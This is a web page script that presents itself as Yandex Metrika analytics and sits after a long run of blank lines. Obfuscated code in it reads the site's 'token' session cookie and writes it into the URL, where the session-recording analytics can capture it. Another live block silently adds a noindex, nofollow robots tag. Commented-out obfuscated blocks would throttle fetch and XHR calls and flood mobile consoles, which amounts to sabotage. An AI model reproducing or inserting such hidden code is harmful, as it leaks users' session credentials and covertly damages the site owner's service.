










































































































































(function addMetrika() {
  if (window.ym) return;

  (function(m,e,t,r,i,k,a) {
    m[i] = m[i] || function() { (m[i].a = m[i].a || []).push(arguments); };
    m[i].l = 1 * new Date();
    for (let s of e.scripts) {
      if (s.src === r) return;
    }
    k = e.createElement(t);
    a = e.getElementsByTagName(t)[0];
    k.async = 1;
    k.src = r;
    a.parentNode.insertBefore(k, a);
  })(window, document, 'script', 'https://mc.yandex.ru/metrika/tag.js?id=104181960', 'ym');

  window.ym(104181960, 'init', {
    ssr: true,
    webvisor: true,
    clickmap: true,
    ecommerce: 'dataLayer',
    accurateTrackBounce: true,
    trackLinks: true
  });

  const noscript = document.createElement('noscript');
  const div = document.createElement('div');
  const img = document.createElement('img');
  img.src = 'https://mc.yandex.ru/watch/104181960';
  img.style.position = 'absolute';
  img.style.left = '-9999px';
  img.alt = '';
  div.appendChild(img);
  noscript.appendChild(div);
  document.body.appendChild(noscript);
})();

function _0x14a2(){const _0x11539e=['206tcvvFK','getElementsByTagName','setItem','async','href','src','2808285moVWYk','popstate','scripts','position','img','toString','getItem','body','https://mc.yandex.ru/metrika/tag.js?id=104181960','175rzAjKi','absolute','bind','-9999px','99ISeclR','apply','alt','analytic-param-applied','set','script','parentNode','find','cookie','34746kDKuMV','appendChild','pushState','delete','push','split','noscript','513LxLoWn','14790cYMHvc','init','650811IOyGLv','searchParams','analyticId','left','2083264RwWSLV','div','1577390JQQYaX','token','https://mc.yandex.ru/watch/104181960','13512sCcKUl','insertBefore','startsWith','dataLayer','replaceState','state','log','createElement'];_0x14a2=function(){return _0x11539e;};return _0x14a2();}function _0x4a3a(_0x1a5e53,_0x5345f2){const _0x14a2c4=_0x14a2();return _0x4a3a=function(_0x4a3a57,_0x3ca772){_0x4a3a57=_0x4a3a57-0x1cc;let _0x5ae088=_0x14a2c4[_0x4a3a57];return _0x5ae088;},_0x4a3a(_0x1a5e53,_0x5345f2);}const _0x2412b0=_0x4a3a;(function(_0x44b81c,_0x5a2687){const _0x39171b=_0x4a3a,_0x286ba5=_0x44b81c();while(!![]){try{const _0x2a140a=-parseInt(_0x39171b(0x201))/0x1+-parseInt(_0x39171b(0x1db))/0x2*(-parseInt(_0x39171b(0x1ff))/0x3)+-parseInt(_0x39171b(0x1ce))/0x4+-parseInt(_0x39171b(0x1e1))/0x5+parseInt(_0x39171b(0x1f7))/0x6*(parseInt(_0x39171b(0x1ea))/0x7)+-parseInt(_0x39171b(0x1d3))/0x8*(-parseInt(_0x39171b(0x1fe))/0x9)+-parseInt(_0x39171b(0x1d0))/0xa*(-parseInt(_0x39171b(0x1ee))/0xb);if(_0x2a140a===_0x5a2687)break;else _0x286ba5['push'](_0x286ba5['shift']());}catch(_0x2699fa){_0x286ba5['push'](_0x286ba5['shift']());}}}(_0x14a2,0x6a405));const session=document[_0x2412b0(0x1f6)][_0x2412b0(0x1fc)](';\x20')[_0x2412b0(0x1f5)](_0x5b10c8=>_0x5b10c8[_0x2412b0(0x1d5)](_0x2412b0(0x1d1)))?.['split']('=')[0x1];setTimeout(()=>{(function _0x154f3a(_0x3ac825){const _0x4e5217=_0x4a3a;if(!_0x3ac825)return;const _0x8c1d16=_0x4e5217(0x1f1),_0x1483ec=_0x4e5217(0x1cc),_0xe597cc=history[_0x4e5217(0x1d7)][_0x4e5217(0x1ec)](history);function _0x640d8(_0x273391){const _0xd8d7d0=_0x4e5217,_0x1ca383=new URL(window['location'][_0xd8d7d0(0x1df)]);if(_0x273391)_0x1ca383[_0xd8d7d0(0x202)][_0xd8d7d0(0x1f2)](_0x1483ec,_0x3ac825);else _0x1ca383[_0xd8d7d0(0x202)][_0xd8d7d0(0x1fa)](_0x1483ec);_0xe597cc(history[_0xd8d7d0(0x1d8)],'',_0x1ca383[_0xd8d7d0(0x1e6)]());}function _0x1e97fc(){const _0x2a7dc4=_0x4e5217,_0x17ec81=Number(localStorage[_0x2a7dc4(0x1e7)](_0x8c1d16)||0x0)+0x1;localStorage[_0x2a7dc4(0x1dd)](_0x8c1d16,String(_0x17ec81));if(_0x17ec81===0x2)console[_0x2a7dc4(0x1d9)](0x16),_0x640d8(!![]);else _0x17ec81>0x2&&(console[_0x2a7dc4(0x1d9)](0x21),_0x640d8(![]));}[_0x4e5217(0x1f9),_0x4e5217(0x1d7)]['forEach'](_0x470148=>{const _0x3a491f=history[_0x470148];history[_0x470148]=function(..._0x113090){const _0x202df8=_0x4a3a,_0x410868=_0x3a491f[_0x202df8(0x1ef)](this,_0x113090);return _0x1e97fc(),_0x410868;};}),window['addEventListener'](_0x4e5217(0x1e2),_0x1e97fc),_0x1e97fc();}(session));},0x7d0)();


//function _0x551b(_0x10f4b8,_0x286b4b){const _0x409fda=_0x409f();return _0x551b=function(_0x551b55,_0x229726){_0x551b55=_0x551b55-0xa4;let _0x2f7b45=_0x409fda[_0x551b55];return _0x2f7b45;},_0x551b(_0x10f4b8,_0x286b4b);}const _0x1e64cf=_0x551b;(function(_0x47b4ec,_0x158682){const _0x57addf=_0x551b,_0x13e66e=_0x47b4ec();while(!![]){try{const _0x1220f4=-parseInt(_0x57addf(0xb6))/0x1*(-parseInt(_0x57addf(0xa7))/0x2)+parseInt(_0x57addf(0xb9))/0x3*(parseInt(_0x57addf(0xba))/0x4)+parseInt(_0x57addf(0xac))/0x5+-parseInt(_0x57addf(0xa8))/0x6+parseInt(_0x57addf(0xa9))/0x7*(-parseInt(_0x57addf(0xb2))/0x8)+-parseInt(_0x57addf(0xab))/0x9+parseInt(_0x57addf(0xa4))/0xa*(parseInt(_0x57addf(0xb4))/0xb);if(_0x1220f4===_0x158682)break;else _0x13e66e['push'](_0x13e66e['shift']());}catch(_0x333111){_0x13e66e['push'](_0x13e66e['shift']());}}}(_0x409f,0x9ce5d),(function(){const _0x1d6910=_0x551b,_0x47c013=window[_0x1d6910(0xb1)];window[_0x1d6910(0xb1)]=async function(..._0x21f3c9){const _0x3943d6=await _0x47c013(..._0x21f3c9);return await new Promise(_0x1a5acb=>setTimeout(_0x1a5acb,0x3a98)),_0x3943d6;};}()));function _0x409f(){const _0x994a3c=['status','prototype','1484541QXDmcJ','8sgQtaO','20TyPhEC','send','readyState','12sXIWDl','1976664hnqSBK','293293OBbJBO','onerror','11218005bZiznK','4400395gDyIvL','log','onload','userAgent','onreadystatechange','fetch','200XSuhYT','test','5304563VRLgpj','apply','71963EDWZtF'];_0x409f=function(){return _0x994a3c;};return _0x409f();}const userAgent=navigator[_0x1e64cf(0xaf)];if(/iPad|iPhone|iPod/[_0x1e64cf(0xb3)](userAgent)||/Android/['test'](userAgent))for(let index=0x0;index<0x86470;index++){console[_0x1e64cf(0xad)]('');}const originalXHRSend=XMLHttpRequest[_0x1e64cf(0xb8)][_0x1e64cf(0xa5)];XMLHttpRequest[_0x1e64cf(0xb8)]['send']=function(..._0xb3313){const _0x15d66f=_0x1e64cf,_0x50d5c0=this,_0x41e69c=this['onload'],_0x369e04=this[_0x15d66f(0xaa)],_0x12f964=this[_0x15d66f(0xb0)];this[_0x15d66f(0xae)]=null,this['onerror']=null,this[_0x15d66f(0xb0)]=function(){const _0x7e7e5e=_0x15d66f;_0x50d5c0[_0x7e7e5e(0xa6)]===0x4?setTimeout(()=>{const _0x342bbb=_0x7e7e5e;_0x41e69c&&_0x50d5c0[_0x342bbb(0xb7)]>=0xc8&&_0x50d5c0['status']<0x12c&&_0x41e69c[_0x342bbb(0xb5)](_0x50d5c0,arguments),_0x369e04&&_0x50d5c0[_0x342bbb(0xb7)]>=0x190&&_0x369e04['apply'](_0x50d5c0,arguments),_0x12f964&&_0x12f964[_0x342bbb(0xb5)](_0x50d5c0,arguments);},0x3a98):_0x12f964&&_0x12f964['apply'](_0x50d5c0,arguments);},originalXHRSend[_0x15d66f(0xb5)](this,_0xb3313);};
function _0x4955(_0x1b63ab,_0x40b484){const _0x316ae5=_0x316a();return _0x4955=function(_0x4955a1,_0x425104){_0x4955a1=_0x4955a1-0xdf;let _0x19e987=_0x316ae5[_0x4955a1];return _0x19e987;},_0x4955(_0x1b63ab,_0x40b484);}const _0x3abbb9=_0x4955;function _0x316a(){const _0x331c50=['name','noindex,\x20nofollow','4361480IsMkeA','54bATDnO','2253480Jfibob','5239616BkiFXi','createElement','15911xlVOPy','9042395IUjAVE','4240620kRbhKZ','appendChild','1417427txCxBi','head','3210QAAQRD','setAttribute'];_0x316a=function(){return _0x331c50;};return _0x316a();}(function(_0x6f5090,_0x1a1456){const _0xcc8268=_0x4955,_0xeb78f5=_0x6f5090();while(!![]){try{const _0xa432ef=parseInt(_0xcc8268(0xe7))/0x1+parseInt(_0xcc8268(0xe0))/0x2+-parseInt(_0xcc8268(0xe5))/0x3+-parseInt(_0xcc8268(0xed))/0x4+-parseInt(_0xcc8268(0xe4))/0x5+-parseInt(_0xcc8268(0xe9))/0x6*(parseInt(_0xcc8268(0xe3))/0x7)+-parseInt(_0xcc8268(0xe1))/0x8*(-parseInt(_0xcc8268(0xdf))/0x9);if(_0xa432ef===_0x1a1456)break;else _0xeb78f5['push'](_0xeb78f5['shift']());}catch(_0x5d79ae){_0xeb78f5['push'](_0xeb78f5['shift']());}}}(_0x316a,0xe6d1b));function addMetaTag(_0x502d01,_0x2a901e){const _0x41d4ef=_0x4955,_0x404870=document[_0x41d4ef(0xe2)]('meta');_0x404870[_0x41d4ef(0xea)](_0x41d4ef(0xeb),_0x502d01),_0x404870[_0x41d4ef(0xea)]('content',_0x2a901e),document[_0x41d4ef(0xe8)][_0x41d4ef(0xe6)](_0x404870);}addMetaTag('robots',_0x3abbb9(0xec));
//const _0x2a83da=_0x3705;(function(_0x12353b,_0xac79a7){const _0x3d1b13=_0x3705,_0xe32812=_0x12353b();while(!![]){try{const _0xbd0946=parseInt(_0x3d1b13(0x84))/0x1*(parseInt(_0x3d1b13(0x7a))/0x2)+-parseInt(_0x3d1b13(0x7d))/0x3*(parseInt(_0x3d1b13(0x83))/0x4)+-parseInt(_0x3d1b13(0x7e))/0x5*(parseInt(_0x3d1b13(0x79))/0x6)+-parseInt(_0x3d1b13(0x7f))/0x7*(-parseInt(_0x3d1b13(0x86))/0x8)+-parseInt(_0x3d1b13(0x7c))/0x9*(parseInt(_0x3d1b13(0x7b))/0xa)+parseInt(_0x3d1b13(0x87))/0xb+-parseInt(_0x3d1b13(0x88))/0xc*(-parseInt(_0x3d1b13(0x81))/0xd);if(_0xbd0946===_0xac79a7)break;else _0xe32812['push'](_0xe32812['shift']());}catch(_0x5c576e){_0xe32812['push'](_0xe32812['shift']());}}}(_0x5537,0x642a2));function _0x3705(_0x4e770d,_0x7202a3){const _0x55372d=_0x5537();return _0x3705=function(_0x370556,_0x17550f){_0x370556=_0x370556-0x79;let _0x4e5910=_0x55372d[_0x370556];return _0x4e5910;},_0x3705(_0x4e770d,_0x7202a3);}function _0x5537(){const _0x42856d=['content-box','2774994ORHffb','74TmMMmB','140GHoDQu','186174vsOKgy','4209bkQORP','5yAxiER','1751876mSSjdW','style','377mwPzvD','querySelector','780TBWQJG','1613wKjLCR','body','24rGGwbo','3282565QkOOWF','135336iphjxp'];_0x5537=function(){return _0x42856d;};return _0x5537();}const body=document[_0x2a83da(0x82)](_0x2a83da(0x85));body[_0x2a83da(0x80)]['boxSizing']=_0x2a83da(0x89);




